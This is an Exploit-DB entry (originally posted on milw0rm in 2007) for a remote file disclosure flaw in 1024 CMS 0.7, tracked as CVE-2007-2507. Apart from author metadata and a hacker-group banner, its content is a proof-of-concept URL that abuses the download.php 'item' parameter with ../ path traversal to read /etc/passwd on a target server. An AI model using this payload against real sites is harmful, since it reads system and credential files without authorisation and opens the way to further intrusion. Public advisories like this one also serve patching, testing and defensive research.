1024 CMS 0.7 - 'download.php' Remote File Disclosure

EDB-ID:

3832

CVE:

2007-2507

EDB Verified:

Author:

Dj7xpl

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2007-05-02

Vulnerable App:

                                                       \#'#/
                                                       (-.-)
                              --------------------oOO---(_)---OOo-------------------
                              |                [ Y! Underground Group ]            |
                              |                 [ www.dj7xpl.2600.ir ]             |
                              |                  [ Dj7xpl @ 2600.ir ]              |
                              ------------------------------------------------------


<--------------------------------------------------------------------------------------------------------------------->

 [!] Portal :  1024 CMS Version 0.7
 [!] Vendor :  http://www.treble.lfhost.com
 [!] Author :  Dj7xpl
 [!] Type   :  Remote File Disclosure Vuln
 [!] We Are :  Y4Ho0 -Mr.Mithridates -Sir SiSiLi -System Failure -Satanic Soulfull -And Me

<--------------------------------------------------------------------------------------------------------------------->

<--------------------------------------------------------------------------------------------------------------------->

PoC :

http://[Target]/[Path]/includes/download.php?item=../uploads/[File]
http://Target.com/1024/includes/download.php?item=../uploads/../../../../../etc/passwd

<--------------------------------------------------------------------------------------------------------------------->

# milw0rm.com [2007-05-02]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services